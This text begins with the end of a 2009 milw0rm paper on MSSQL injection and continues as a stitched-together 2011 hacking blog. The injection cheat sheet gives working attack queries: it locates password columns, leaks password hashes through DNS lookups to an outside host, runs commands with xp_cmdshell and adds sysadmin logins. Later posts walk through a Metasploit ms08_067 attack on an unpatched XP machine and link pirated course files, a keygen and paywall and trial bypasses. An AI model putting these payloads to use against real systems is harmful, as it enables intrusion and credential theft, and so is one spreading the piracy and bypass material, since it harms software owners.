 |  | for master..sometable           |
 |---------------|---------------------------------------------------------------------------|
 |   | -- NB: This example works only for the current database.      |
 |  | If you wan't to search another db, you need to specify the db name     |
 |  Find Tables | (e.g. replace sysobject with mydb..sysobjects).       |
 |     From |             |
 |  Column Name | SELECT sysobjects.name as tablename, syscolumns.name as columnname     |
 |  | FROM sysobjects JOIN syscolumns ON sysobjects.id = syscolumns.id     |
 |  | WHERE sysobjects.xtype = 'U' AND syscolumns.name LIKE '%PASSWORD%' --     |
 |  | this lists table, column for each column containing the word 'password'   |
 |---------------|---------------------------------------------------------------------------|
 |    Select | SELECT TOP 1 name FROM (SELECT TOP 9 name FROM master..syslogins     |
 |    Nth Row | ORDER BY name ASC) sq ORDER BY name DESC -- gets 9th row      |
 |---------------|---------------------------------------------------------------------------|
 |Select Nth Char| SELECT substring('abcd', 3, 1) -- returns c        |
 |---------------|---------------------------------------------------------------------------|
 |  Bitwise AND  | SELECT 6 & 2 -- returns 2          |
 |  | SELECT 6 & 1 -- returns 0          |
 |---------------|---------------------------------------------------------------------------|
 |  ASCII Value | SELECT char(0x41) -- returns A         |
 |   -> Char |             |
 |---------------|---------------------------------------------------------------------------|
 | Char -> ASCII | SELECT ascii('A') - returns 65         |
 |     Value |             |
 |---------------|---------------------------------------------------------------------------|
 |    Casting    | SELECT CAST('1' as int);          |
 |  | SELECT CAST(1 as char)          |
 |---------------|---------------------------------------------------------------------------|
 |    String | SELECT 'A' + 'B' - returns AB          |
 | Concatenation |             |
 |---------------|---------------------------------------------------------------------------|
 | If Statement  | IF (1=1) SELECT 1 ELSE SELECT 2 -- returns 1        |
 |---------------|---------------------------------------------------------------------------|
 |Case Statement | SELECT CASE WHEN 1=1 THEN 1 ELSE 2 END -- returns 1       |
 |---------------|---------------------------------------------------------------------------|
 |Avoiding Quotes| SELECT char(65)+char(66) -- returns AB        |
 |---------------|---------------------------------------------------------------------------|
 |  Time Delay   | WAITFOR DELAY '0:0:5' -- pause for 5 seconds        |
 |---------------|---------------------------------------------------------------------------|
 |  | declare @host varchar(800); select @host = name FROM master..syslogins;   |
 |  | exec('master..xp_getfiledetails ''\\' + @host + '\c$\boot.ini''');     |
 |  | -- nonpriv, works on 2000          |
 |  |             |
 |  | declare @host varchar(800); select @host = name + '-' +      |
 |     Make | master.sys.fn_varbintohexstr(password_hash) + '.2.pentestmonkey.net'     |
 | DNS Requests | from sys.sql_logins; exec('xp_fileexist ''\\' + @host + '\c$\boot.ini''');|
 |  | -- priv, works on 2005          |
 |  |             |
 |  | -- NB: Concatenation is not allowed in calls to these SPs, hence why we   |
 |  | have to use @host.  Messy but necessary.        |
 |  | -- Also check out theDNS tunnel feature of sqlninja       |
 |---------------|---------------------------------------------------------------------------|
 |    Command | EXEC xp_cmdshell 'net user'; -- priv         |
 |   Execution   |             |
 |---------------|---------------------------------------------------------------------------|
 |     Local | CREATE TABLE mydata (line varchar(8000));        |
 |  File Access | BULK INSERT mydata FROM 'c:\boot.ini';        |
 |  | DROP TABLE mydata;           |
 |---------------|---------------------------------------------------------------------------|
 | Hostname, IP  | SELECT HOST_NAME()           |
 |---------------|---------------------------------------------------------------------------|
 | Create Users  | EXEC sp_addlogin 'user', 'pass'; -- priv        |
 |---------------|---------------------------------------------------------------------------|
 |  Drop Users   | EXEC sp_droplogin 'user'; -- priv         |
 |---------------|---------------------------------------------------------------------------|
 | Make User DBA | EXEC master.dbo.sp_addsrvrolemember 'user', 'sysadmin; -- priv     |
 +---------------+---------------------------------------------------------------------------+


########################################
 [0x06] - SQL Injection Countermeasures
########################################

 Main cause of SQL injection vulnerability is input validation. Many web developers do not provide
proper mechanism in order to sanitize any form of input. So, attackers take advantage of this point and gain access
to many databases. There are solutions to prevent SQL injection vulnerability.

 - Use whilelist input: because we cannot know all of bad inputs, so the efficient way is to allow only our known-valid input
 - Check input type: in some cases, attackers inject string into numeric input field or inject numeric into string input field, 
   these may cause SQL injection vulnerability
 - Escape database metacharacters: use / in order to escape database metacharacters by prepending / in front of metacharaters.
 - Don't ignore any ways of input: attackers can manipulate input to exploit SQL vulnerabilities, so you must not care only query string but also headers, 
   cookies and form fields as well
 - Use Parameterized Queries: MSSQL provides API for handling inputs which can help us to prevent SQL injection. 
   This mechanism is called "Parameterized Queries".

   The following two code samples illustrate the difference between an unsafe query dynamically constructed out of 
  user data, and its safe parameterized counterpart. 
 
   In the first, the user-supplied name parameter is embeded directly into a SQL statement, leaving the 
  application vulnerable to SQL injection:

   //define the query structure
   string queryText = "select ename,sak from emp where ename ='";
  
   //concatenate the user-supplied name
   queryText += request.getParameter("name");
   queryText += "'";
  
   //execute the query
   stmt = con.createStatement();
   rs = stmt.executeQuery(queryText);
 
   In the second example, the query structure is defined using a question mark as a placeholder 
  for the user-supplied parameter. The prepareStatement method is invoked to interpret this, and fix the structure 
  of the query that is to be executed. Only then is the setString method used to specify the actual value of 
  the parameter. Because the query's structure has already been fixed, this value can contain any data at all, 
  without affecting the structure. The query is then executed safely:

   //define the query structure
   String queryText = "select ename,sal from emp where ename = ?";
  
   //prepare the statement through DB connection "con"
   stmt = con.prepareStatement(queryText);
  
   //add the user input to variable 1 (at the first ? placeholder)
   stmt.setSting(1, request.getParameter("name"));
  
   //execute the query
   rs = stmt.executeQuery();


#####################
 [0x07] - References
#####################

[1] Error based SQL injection - a true story: AnalyseR
[2] Advanced SQL Injection In SQL Server Applications: Chris Anley
[3] ASCII Encoded/Binary String Automated SQL Injection Attack: Michael Zino
[4] http://pentestmonkey.net
[5] http://www.owasp.org
[6] http://www.milw0rm.com

####################
 [0x08] - Greetz To
####################
 
Greetz     : ZeQ3uL, JabAv0C, p3lo, Sh0ck, BAD $ectors, Snapter, Conan, Win7dos, Gdiupo, GnuKDE, JK
Special Thx : asylu3, str0ke, citec.us, milw0rm.com

    ----------------------------------------------------
 This paper is written for Educational purpose only. The authors are not responsible for any damage 
 originating from using this paper in wrong objective. If you want to use this knowledge with other person systems, 
    you must request for consent from system owner before
    ----------------------------------------------------

# milw0rm.com [2009-01-29]

Notification for PayPal users in India

noreply@blogger.com (ArtistAshish) — Thu, 03 Mar 2011 19:14:00 +0000

With effect from 1 March 2011, you are required to comply with the requirements set out in the notification of the Reserve Bank of India governing the processing and settlement of export-related receipts facilitated by online payment gateways ("RBI Guidelines").

1.Any balance in and all future payments into your PayPal account may not be used to buy goods or services and must be transferred to your bank account in India within 7 days from the receipt of confirmation from the buyer in respect of the goods or services; and

2.Export-related payments for goods and services into your PayPal account may not exceed US$500 per transaction.

We seek your understanding as we continue to employ our best efforts to comply with the RBI Guidelines in a timely manner.

We regret any inconvenience caused to you and hope the advance notice will enable you to plan your future use of our services accordingly.

Sincerely,

The PayPal Team

red]Frequently Asked Questions:

Q: Why will PayPal not allow me to receive more than US$500?

Starting 1 March, 2011, PayPal customers in India will not be allowed to receive payments for any export-related goods or services for an amount exceeding US$500 per transaction. This change is to ensure that we continue to comply with the RBI Guidelines.

Q: Why will PayPal not allow me to keep money in my PayPal balance?

Starting 1 March, 2011, PayPal customers in India will not be able to keep money in their PayPal account balance. Instead, all money received into a PayPal account must be transferred to a customer's India bank account within 7 days from the receipt of confirmation from the buyer in respect of the good or services. This change is to ensure that we continue to comply with the RBI Guidelines.

Q: Will my customers be able to complete their checkout with their PayPal account balance?

We're glad that you offer PayPal to your customers. Unfortunately, we will not allow customers in India to send money from their PayPal account balance starting 1 March, 2011. This means that your customers will need to link a credit card to their account in before sending you money with PayPal. This change is to ensure that we continue to comply with the RBI Guidelines.

Q: The customers on my website are not able to complete purchase or pay via PayPal. Why?

Starting 1 March, 2011, PayPal customers in India will not be allowed to receive payments for any export-related goods or services for an amount exceeding US$500 per transaction. If you are listing products greater than US$500 per transaction then you may need to seek alternative methods of payment. This change is to ensure that we continue to comply with the RBI Guidelines.

Q: What is meant by receipt of confirmation from the buyer in respect of goods and services?

As an exporter of products or services abroad, you need to ensure that your buyer has received the product or services as per specifications set out on your website. As an exporter of goods, you may withdraw the balance to your bank account in India upon reasonable consideration of shipping time and other clearances such as excise and customs for the destination country. As an exporter of services, you may withdraw the balance to your bank account in India upon receipt of payment from your buyer into your PayPal account.

Q: I am unable to find the Mass Payment feature in your website. Why?

In order to comply with the RBI Guidelines, PayPal customers in India will not be allowed to use the Mass Payment feature. In accordance with the regulations, we will be disallowing users from using any balance in and all future payments into their PayPal accounts to buy goods or services. All users will have to use their credit cards for making such payments. Since our Mass Payment feature supports only payment from balance and not credit cards, we will be discontinuing this feature. However, users will be able to receive Mass Payment into their PayPal account.

Twiends Promotional Codes.... Enter to get free credits on Twiends.com

noreply@blogger.com (ArtistAshish) — Thu, 03 Mar 2011 18:07:00 +0000

Twiends.com is the site for traffic Exchange
here are few codes to get Free credits on Twiends.com

LK4W2Q (50 credits)
54MU1W (50 credits)
AX2KRZ (50 credits)
KE3YZ1 (75 credits)
98HJ1A (75 credits)

Don’t fall prey to mobile spoofing

noreply@blogger.com (ArtistAshish) — Sat, 26 Feb 2011 10:27:00 +0000

Have you ever received a weird SMS from a friend which he or she later claimed never to have sent? You are lucky if you haven’t because more and more people in the city are falling prey to mobile spoofing where one can send SMS from any number without touching the actual phone. All one needs to do is to login to a certain website, register and start sending messages to any one in India with someone else’s mobile number.

After Internet Protocol (IP) or caller ID faking, mobile spoofing is the new security threat that has hit the country. Though the technology has been around for sometime, it is of late catching up with youths in the city. Ethical hackers warn that while many youngsters think they are playing a prank, it may turn out to be a major security risk if some terrorist or anti-social elements get involved in it.

According to cyber crime experts, the person receiving the SMS will not know whether the message is fake or not. The websites facilitating mobile spoofing exploit certain security vulnerabilities to obtain access to the SMS-Internet tunnel by creating a malicious code. Even the mobile service provider is not aware when the network is being misused.

Says additional SP (cyber crimes) U. Rammohan, “We can trace the sender of the fake messages through the IP address, but it is quite a challenging task,” he points out.

Mobile spoofing websites offer both free and paid SMS spoofing services. The popular websites among youngsters are: xxsidxx.co.cc, fakemsg.com, fakemytext.com, www.sneaksms.com and sms.fake.com. There’s also a dedicated software called “SMS spoof” which is freely available on the Internet.

Ethical hackers blame mobile companies for this. “They need to set up advanced authentication mechanisms. SMS servers are hugely vulnerable since they are not properly secured,” observes networking security engineer M.M. Ganga Raju. “The only way to detect and block spoofed messages is to screen incoming messages to verify that the sender is a valid subscriber,” he adds.

“You can send an SMS from a website to a woman using her husband’s number informing her to hand over money to a person he deputes, because of which chances are that she may hand over the money to the impostor,” says ethical hacker M.V. Rama Rao.

Ethical Hacking -E-books Course Download for Easy Learning

noreply@blogger.com (ArtistAshish) — Thu, 24 Feb 2011 10:40:00 +0000

Certied Ethical Hacking and Countermeasure Course v6.12 AIO

Well here is the perfect collection of CEH to be a Professional CEH

CEH-Classroom-Lab-Setup-v6.pdf
CEHv6 Module 00 Student Introduction.pdf
CEHv6 Module 01 Introduction to Ethical Hacking.pdf
CEHv6 Module 02 Hacking Laws.pdf
CEHv6 Module 03 Footprinting.pdf
CEHv6 Module 04 Google Hacking.pdf
CEHv6 Module 05 Scanning.pdf
CEHv6 Module 06 Enumeration.pdf
CEHv6 Module 07 System Hacking.pdf
CEHv6 Module 08 Trojans and Backdoors.pdf
CEHv6 Module 09 Viruses and Worms.pdf
CEHv6 Module 10 Sniffers.pdf
CEHv6 Module 11 Social Engineering.pdf
CEHv6 Module 12 Phishing.pdf
CEHv6 Module 13 Hacking Email Accounts.pdf
CEHv6 Module 14 Denial of Service.pdf
CEHv6 Module 15 Session Hijacking.pdf
CEHv6 Module 16 Hacking Webservers.pdf
CEHv6 Module 17 Web Application Vulnerabilities.pdf
CEHv6 Module 18 Web based Password Cracking Techniques.pdf
CEHv6 Module 19 SQL Injection.pdf
CEHv6 Module 20 Hacking Wireless Networks.pdf
CEHv6 Module 21 Physical Security.pdf
CEHv6 Module 22 Linux Hacking.pdf
CEHv6 Module 23 Evading IDS Firewall and Honeypot.pdf
CEHv6 Module 24 Buffer Overflows.pdf
CEHv6 Module 25 Cryptography.pdf
CEHv6 Module 26 Penetration Testing.pdf
CEHv6 Module 28 Writing Virus Codes.pdf
CEHv6 Module 29 Assembly ******** Tutorial.pdf
CEHv6 Module 30 Exploit Writing.pdf
CEHv6 Module 31 Exploit Writing.pdf
CEHv6 Module 32 Exploit Writing.pdf
CEHv6 Module 33 Reverse Engineering Techniques.pdf
CEHv6 Module 34 MAC OS X Hacking.pdf
CEHv6 Module 35 Hacking Routers, Cable Modems and Firewalls.pdf
CEHv6 Module 36 Hacking Mobile Phones, PDA and Handheld Devices.pdf
CEHv6 Module 37 Bluetooth Hacking.pdf
CEHv6 Module 38 VoIP Hacking.pdf
CEHv6 Module 39 RFID Hacking.pdf
CEHv6 Module 40 Spamming.pdf
CEHv6 Module 41 Hacking USB Devices.pdf
CEHv6 Module 42 Hacking Database Servers.pdf
CEHv6 Module 43 Cyber Warfare- Hacking Al-Qaida and Terrorism.pdf
CEHv6 Module 44 Internet Content Filtering Techniques.pdf
CEHv6 Module 45 Privacy on the Internet.pdf
CEHv6 Module 46 Securing Laptop Computers.pdf
CEHv6 Module 47 Spying Technologies.pdf
CEHv6 Module 48 Corporate Espionage by Insiders.pdf
CEHv6 Module 49 Creating Security Policies.pdf
CEHv6 Module 50 Software Piracy and Warez.pdf
CEHv6 Module 51 Hacking and Cheating Online Games.pdf
CEHv6 Module 52 Hacking RSS and Atom.pdf
CEHv6 Module 53 Hacking Web Browsers.pdf
CEHv6 Module 54 ***** Server Technologies.pdf
CEHv6 Module 55 Preventing Data Loss.pdf
CEHv6 Module 56 Hacking Global Positioning System.pdf
CEHv6 Module 57 Computer Forensics and Incident Handling.pdf
CEHv6 Module 58 Credit Card Frauds.pdf
CEHv6 Module 59 How to Steal Passwords.pdf
CEHv6 Module 60 Firewall Technologies.pdf
CEHv6 Module 61 Threats and Countermeasures.pdf
CEHv6 Module 62 Case Studies.pdf
CEHv6 Module 63 Botnets.pdf
CEHv6 Module 64 Economic Espionage.pdf
CEHv6 Module 65 Patch Management.pdf
CEHv6 Module 66 Security Convergence.pdf
CEHv6 Module 67 Identifying the Terrorists.pdf

DOWNLOAD

Part-1
http://rapidshare.com/files/193668787/HCv6_Sam_downarchive.part1.rar

Part-2
http://rapidshare.com/files/193668830/HCv6_Sam_downarchive.part2.rar

Part-3
http://rapidshare.com/files/193668755/HCv6_Sam_downarchive.part3.rar

ENJOY..!

Sharecash Downloader: download sharecash files without survey

noreply@blogger.com (ArtistAshish) — Wed, 23 Feb 2011 06:38:00 +0000

sharecash downloader !!!
enjoy!

here is the download link

http://www.mediafire.com/?hebg45pzqmu0e86

How to use it:( update :- first
download the sharecash
downloader and then cut off
your internet and then open the
downloader it will give some
error so click on continue and
you are done. Now connect to
internet and follow the belows
step )
1. Type in the Sharecash link you
want to download in the textbox.
2. Click On "Go To Url" button.
4. Wait for 30 seconds - 1
minute. Depends on how fast
your Internet speed is.
5. Click "Download".
6. Then Disable your Download
Processer If you have any
7. Then It will popup something
about sharecash just click on ok
8. Now Your downloading will
start
9. Enjoy Friends

Bypass Trial Version Limitations In Any Software

noreply@blogger.com (ArtistAshish) — Wed, 23 Feb 2011 04:59:00 +0000

Have you ever downloaded any trial version software and it may have expired before you could have tested it for its full capabilties. In this trick I will explain to how you can use the trial version of any software over and again so that you can test the software properly before purchasing its full version.Basically there are two type of restrictions put by the software companies on trial version of softwares.

1.Disable some features of the software

2.Time Bound limitations like 5-days Trial version

This trick can extend only your time bound limitations hence provide you with the capability to use the trial version of the software for as long as you want.

Another big advantage of this trick is that it will increase your system security.For this trick we will be using a freeware software called sandboxie which very small(500 kb).It would protect your computer from malware andspywares to make changes to your system. Sandboxie runs the softwares in an isolated enviroment so that they cannot make permanent changes to your system.Here is the graphical representation of the programs running with sandboxie in memory.

Now,here is the step by step tutorial with screenshots on Trick To Bypass Trial Version Limitations In Any Software

1. DOWNLOAD
2. Install and run it.
3. Click on the Sandbox -> DefaultBox –> Run SandBoxed and then click on Run Any Program

Now a new window will popup.Click on Browse

Locate the setup of the trial software you want to install.Click on open
This will open up a new window and delete all the files created, Press the Delete Sandbox button to fully clear the contents.

Now reinstall the software as mentioned above and you will again get the full trial version.

Note:

1.This trick will not work if you have already used the full trial version of the software without sandboxie.

2.Sandboxie may crash if you run very large programs with it

Disclaimer:This tutorial is only for educational purpose and do buy the softwares to get the full capablities of the software.

Install the software and run it.You will see # in the software tittle bar.It indicates that the software is running under sandboxie.

7. You will get the trial of the software and the trial version will expire after the time bound limitation is over.
8. To reuse the software again after the trial version is over click on Click Sandbox –>DefaultBox andclick Delete Contents.

(Note icon biggrin Trick To Bypass Trial Version Limitations In Any Software onot let the software expire.Do these steps before atleast 1-day of the trial software is left.otherwise the above trick may not work )

This will open up a new window and delete all the files created, Press the Delete Sandbox button to fully clear the contents.

Now reinstall the software as mentioned above and you will again get the full trial version.

Note:

1.This trick will not work if you have already used the full trial version of the software without sandboxie.

2.Sandboxie may crash if you run very large programs with it

Disclaimer:This tutorial is only for educational purpose and do buy the softwares to get the full capablitiesof the software.

To run any application installed in sandbox

1)Go to the folder where you have installed sanboxie. Suppose it in F:\ drive.
2)Open "Sandbox" and enter your profile(say my profile is vks in sandboxie so I go to F:\Sandbox\vks )

3)Open the box in which you installed your app. by default you should install in the "Default box"(if you didnt create any other)

4) Now open the folder "drive".In it you'll see your drives.Go to the one you installed your application in and then create a shortcut to the exe of the application on your desktop

Batch Tutorial for Hacking

noreply@blogger.com (ArtistAshish) — Tue, 22 Feb 2011 15:39:00 +0000

Here We Go

We Will Do It Step By Step

To Start Off There Is The @echo off/on
And There Is echo
And pause

So Here Is An Example

@echo off
echo Hello This is a test
pause

Type This In Notepad And Save As Test.bat
Launch It
It Will Look Like This

Hello This is a test
Press any key to continue...

Again Open Notepad And Write:

@echo on
echo Hello This is a test
pause

And Save It On The Desktop As Test2.bat
Launch It , It Will Look Like This

C:\Documents and Settings\User\Desktop>echo Hello This is a test
Hello This is a test
C:\Documents and Settings\User\Desktop>pause
Press any key to continue

So For The Explanation

@echo off/on:
If You Put @echo on It Will Show The Directory As You Just Saw
If You Put @echo off It Will Just Show The Words With No Directories
so its best to use @echo offecho:
If You Want To Type A Simple Phrase Just Type In echo And Something In This Case echo Hello This is a test
which will show Hello This is a test

pause
Pause Will Pause The Batch File,If You Press A Key The Batch Will Continue In This Case It Will Exit Because There Is No More Left
So Try This

@echo off
echo Hello This is a test
pause
echo I am testing pause
pause

This Will Show

Hello This is a test
Press Any Key To Continue...
(when you press a key it will show)
I am testing a pause

So That Convers The Pause Command

Now Some More Commands
There Is Msg *
And There Is cls

Open Notepad And Write:

@echo off
echo Hello This is a test
pause
cls
echo I am testing pause
msg * The End
pause

And Save As Test3.bat

This Will Show

Hello This is a test
Press Any Key To Continue...
(when you press a key it will show)
cls
(the page will clear)
I am testing a pause
(a pop-up will show saying The End)

So .. cls Will Just Clear The Screen
And Msg * Will Bring Up A pop-up:D

Other Commands Are REM And goto And start
So Create A Folder Name It Test
Put Any Picture Inside And Name It testpic
Open Notepad And Type

@echo off
echo Testing start and rem
rem title Test
start testpic.jpg (or any other extension)
pause

And Save It Inside The New Folder As Test4.bat

Launch It , It Will Show:

Testing start and rem
Press Any Key To Continue
(and the picture will launch)

So start Will Launch Any File
And rem Is A Ramark.. Which Wont Show In The Bat File When Running

Now The goto And set And if

Type This Inside Notepad

@echo off
echo This is a test
echo If you want to do math type 1 and press enter
echo If you want to see a picture type 2 and press enter
set /p option=
if '%option%'=='1' goto :math
if '%option%'=='2' start testpic.jpg (or any extension)

:math
echo 2+2
pause

And Save It Inside The New Folder

This Will Show

This is a test
If you want to do math type 1 and press enter
if you want to see a picture type 2 and press enter
(here you can type 1 or 2 and press enter)
(if you press 2 and Enter the picture will load)
(if you press 1 and enter this will show up):
2+2
Press any key to continue...

So goto Will Go To A Label Or A Part Of The File
When You Put :Math
A New Label Will Be Named Math And When You Put goto :math
The Vatch Will Go To :mathset
The Set Option Will Set Something . Here Its Going To Set :choice
The Set Is , In Some Options Followed By if
So If I Type 1 In This Example
The "choice" Will Be 1 .. And It Will Go To :math Because We Put
if '%choice%'=='1' goto :math
So If We Put 1 The Choice Will Be 1 Therefore It Will [reed]goto :math

Now I Am Going To Talk About Call,Exit,And SHIFT?

Go Into Notepad And Type This

@echo off
echo yay me i know the basics of batch
call call.bat
pause
exit

And Save In A New Folder

Then Open Notepad And Type This Again

@echo off
echo I Love You
pause

And Save In The Same Folder That You Saved The Last One And Name It Call.bat

Launch The First One
This Will Show

yay me i know the basics of batch
I Love You
Press Any Key To Continue....
(when you press a key the below will appear)
Press Any Key To Continue...
and when you press a key it will exit

Ok So Now You Know What exit Does It Exits The File And Call ,Calls In Another Batch File!!..
So Now For SHIFT Which Is A Little Hard So Try To Understand

SHIFT [/n]

If Command Extensions are enabled the SHIFT command supports the /n switch which tells the command to start shifting at the nth argument, where n can be between zero and eight.
just like this 1 below

SHIFT /2

would shift %3 to %2, %4 to %3, etc. and leave %0 and %1 . how can i say it

Examples

the below has got to be saved as .bat.. so just name it test

@ECHO OFF
ECHO - %1
SHIFT
ECHO - %1

After creating the above example test.bat file, if you were to type the below command at the MS-DOS prompt, it would print "- ONE" and then "- TWO"; this command is commonly used to work through each of the command extensions or remove command extensions.
(SHIFT , i mean the explanation... i got it from a website and edited it)

Ok I hope you understand

Now we will learn how to launch windows applications:
type in notepad:

@echo off
echo I am testing notepad!
start /MIN notepad
pause

This will show

i am testing notepad
(and notepad will start minimized.. if you put /MAX instead of /MIN it will launch maximized)
Press Any Key To Continue

Now lets learn how to put a timeout inside a batch..

goto notepad and type:

@echo off
echo i am trying timeout
set wait=0
:pause1
set /a wait=%wait%+1
if %wait% leq 1000 goto pause1
echo IT WORKED!\
pause

dont understand the command.. just copy paste it.. or memorize it .. if i tell you the explanation it will take alot of time!!..

so this will show :

i am trying timeout
(couple of seconds and.. )
Press Any Key To Continue...

Now ill teach you how to change the TIME

goto notepad and type:

@echo off
echo i wonder what time it is!!
TIME 5:50
echo Oh so its 5:50
pause

this will show:

i wonder what time its is!!
Oh so its 5:50

The TIME will just change The TIME:

Now the Color

go into notepad and type this

@echo off
echo trying the colors
pause
color 04
echo testing
pause
color f
echo trying
pause
color 4f
echo trying
pause

04=background black and font red
f the font will be white
4f = background red and f = white

Here are the list(that can be found by cmd>color help)
0=black
1=blue
2=green
3=aqua
4=red
5=purple
6=yellow
7=white
8=gray
9=light blue
a=light green
b=light aqua
c=light red
d=light purple
e=light yellow
f=bright white

So this will show it

now the title

type this in notepad

@echo off
tile Test
echo trying the title
pause

this will show the title Test When you launch it!!

lets try Shutdown/Restart

type this in Notepad

@echo off
START C:\Windows\RUNDLL.EXE user.exe,exitwindowsexec
exit

The above will restart

@echo off
Shut down the computer

C:\Windows\RUNDLL32.EXE user,exitwindows
exit

The Above will Shutdown

Well Thats It For Now Enjoy These

BSNL reduces postpaid broadband tariff by up to 75%

noreply@blogger.com (ArtistAshish) — Tue, 22 Feb 2011 10:02:00 +0000

Initiating a price war in the broadband segment, state-run BSNL on Monday announced a reduction in post-paid broadband tariffs by up to 75 per cent, a move that may force private players to follow suite.

BSNL offers tariff in two categories — home users and general users. Under both categories, tariffs are available in limited and unlimited downloads.

To give a push to its broadband business, BSNL has reformulated its existing post-paid broadband tariff structure, it said in a statement.
With the implementation of new tariffs the entry threshold would come down from Rs 2,150 to Rs 850 only translating into a reduction of over 60 per cent.

It has reduced download charges from 50-60 paise per megabyte (MB) to 20 paise per MB for up to 5 gigabyte and 10 paise per MB thereafter. This nearly 75 per cent cut in tariff will be applicable for customers having plans of Rs 250-700.

Additional download charges in limited broadband tariff plans has also been reduced to 10 paise per MB for all customers paying more than Rs 999 fixed monthly charges.

The company has announced new broadband tariff plan for business and corporate customers. This new plan launched in the name of ‘BBG COMBO ULD 850’ will provide unlimited download to business customers at a download speed of 1 mega byte per second (mbps) up to 8 GB and 256 kilo byte per second (kbps) thereafter.

The company has also upgraded download speed in various post-paid plans by 50 per cent, besides increasing free download limit under its various tariff plans up from 10 GB to 250 GB.

The company announced an increase in free calls limit for its combo plan. Free calls have been doubled from 250 to 500, 300 to 500 and 500 to 1000 under different categories.

In addition to this, the company has introduced free calls facility in four combo packages. The number of free calls range between 500 to 2000.

BSNL has 60 per cent market share in broadband segment and expects that these new changes in tariff plans to change the broadband landscape of the country.

Norton Ghost 15.0.0.35659 ( New Antivirus Software )

noreply@blogger.com (ArtistAshish) — Tue, 22 Feb 2011 09:57:00 +0000

Norton Ghost 15 is a robust backup solution and professional quality for home users and small businesses.
.
With Norton Ghost 15, lost or damaged files can be recovered and restored in the event of a system failure, even if the computer's operating system does not start.
It also allows backup of an entire system or specific files and folders to save recovery points to offsite locations using FTP.
.
Norton Ghost 15 is also flexible, allowing users to decide when to back up your system, either on an hourly basis or on an event.
.
Style: Backup, Cloning HD's
Manufacturer: Symantec
Size: 119.6 Mb
Format: Rar
Language: English
.
Link To Download Full with KeyGen Below:
.
Norton Ghost 15

http://www.4shared.com/file/Y9uFBFAV/Norton_Ghost_15.html

Learning new updates from Facebook: No FBML soon

noreply@blogger.com (ArtistAshish) — Tue, 22 Feb 2011 09:55:00 +0000

Hi guys.

So we all know that Facebook recently announced that from March 11, 2011, the Static FBML application will no longer be available to be added to Pages and that no new FBML applications can be created after that date.

The good news is they are allowing i-frames, this application allows you to add "external" content on your facebook page without any limitations which were set by FBML. Now you have no limitations and use full support of HTML, CSS, and JavaScript like any other Web page does.

This is all we need to do as told be facebook:
1) Upload all your files on an external server (FTP)
2) Installing the facebook developer application at facebook(dot)com/developers (with this, you can create your own tab ie., an application which gets "added" to any of the page you admin using HTML, CSS and JAVA and not FBML)

I know about step 2, and have no questions as of now. But I have a question about step 1 as read above. What does it mean by uploading on some server? Does it mean we can upload our files on some file hosting website? What's the best way to do step 1?

Also, share your new techniques/creativity of changing your pages with full HTML/CSS support. I need to design a tab for my page which must look just like a website (with menu options), using this NEW update from facebook. Let's share our work.

Thanks. :)

the pride of all mighty GOD SASORI sama

noreply@blogger.com (ArtistAshish) — Tue, 01 Feb 2011 15:02:00 +0000

Ok this is for those who doubt the awesomeness of sasori sama.

I will not go in the details of his powers, that's what they have WIKI for. I will present some of the other things about him that are so huge, so awesome that it is too much even for wiki.

1. He is GOD.

2. HE had 298 human puppets.

No seriously, if all u people have deduced that sasori is 1 of the weakest on the basis of his fighting with the old hag, u are sorely mistaken.

He had 298 freakin' puppets. Chiyo and sakura had it only in 1 that was kazekage. Now sasori could have unleashed any of his other 297 puppets then but he didn't. Can any1 say why ? He just wanted to show his granny how awesome he had became now. He wanted to show his granny only the best works of him and that's why.The love blinded him

Plus he had that freakin' poison needles.

1 canister in the air,
300 needles in the atmosphere,
If u got touched even by a 1,
u only got 3 days to live hon,
u are struck with a poison with no remedy..,
U just create a lot of pity,
U are paralyzed for the rest 3 days, just for your know,
Fuck u dude u are just nailed for the good yo !!!

There. I depicted sasori sama's awesomeness right in front of u and that too rhymed while doing it. Man, I am AWESOME.

UNDERSTANDING METASPOILT HACKING- tutorial

noreply@blogger.com (ArtistAshish) — Tue, 01 Feb 2011 13:20:00 +0000

NOTE: I'm not responsible for anything you do with this info!

I'll not go in deep to make this paper boring :)

Okay so let's begin!

First of all, you would be thinking what is Metasploit?
Metasploit is a framework which allow us to penetest the remote machine to see if its vulnerable to any exploit and if yes, then we can control that remote machine from our own computer.

How it works?
Metasploit works on 3 things -

1. Vulneribility
2. Exploits
3. Payloads

Okay, let me give you a real life example.

Just imagine there's a house which is locked, and a theif comes and if he tries 7-8 combinations of keys then he is able to crack that lock, and get into the house.

=>> Now this thing is called vulneribilty according to Metasploit.

Now the theif tries some combinations of keys and he is able to get into the house successfully.

=>> Now this is called exploit according to Metasploit.

Now it depends on the theif what he wanna do with the house, he can whether steal jwellery, money and any other item present in house. Basically the things that he do after getting in the house.

=>> Now this is called payload according to Metasploit.

Okay now let me explain you this in a hacker's language.

Just imagine you have found a vulnerable computer with XP sp2 as operating system. And there's a exploit available from XP sp2 already.

=>> So this is called vulneribilty.

Now you apply the exploit by providing victim's IP address and any open port.

=>> This is called exploit.

Now you need to send payload in his computer, there are many payloads available in Metasploit from which you can get a shell in victim's pc, capture his keystrokes, control his PC through remote desktop, upload and execute a .EXE file, etc many other things.

=>> This is known as payload.

Now the question is how to use Metasploit?

Hmm, Metasploit is available in two platforms - console (cmd) and GUI (graphical user interface).

Console is the best, so we'll go on it.

Metasploit has different commands for different things.

If you want to see exploit simply type = show exploits.
If you want to see payload, type = show payloads
After setting all options now type = exploit

Okay so now basics are cleared that how Metasploit works. Now lets move on to some higher level, which is hacking ;)

Suppose you have a victim who is running XP SP2 unpatched version, and you have his IP.

Now you need to open msfconsole.

Wait, let it load, it'll take sometime as it has more than 600 exploits and 200 payloads.

Now when it is loaded type cmd = db_driver sqlite3

=>> It'll load the database driver.

Now type = db_create

=>> It'll create a new database.

Type = show exploits

=>> It'll get the list of all exploits currently present in Metasploit database.

Now type = use [exploit name] (we'll use windows/smb/ms08_067_netapi exploits, as we are attacking a XP SP2 machine)

So type = use windows/smb/ms08_067_netapi

=>> It'll load the exploit. Usually all exploits are to be executed on a third party software's security hole. But this exploit is found in the windows XP's system file.

Now you need to select payload, type = show payloads

=>> It'll show you all payloads currently in the database, now we'll use vncinject payload (payload cmd = set PAYLOAD [payload name].

So type = set PAYLOAD windows/vncinject/bind_tcp

Now type = show options

=>> It'll sort out all the options that you need to fill now.

To fill the option the cmd is = set [option name] [your selection(answer)]

You need to fill some options like RHOST, RPORT, LPORT, LHOST, etc. Fill them as I said.

RHOST (remote host) = Remote machine's IP (victim's IP)

To see victim's open port use Nmap to scan his IP and get the open ports. Now when you are done fill all options.

And at last type = exploit

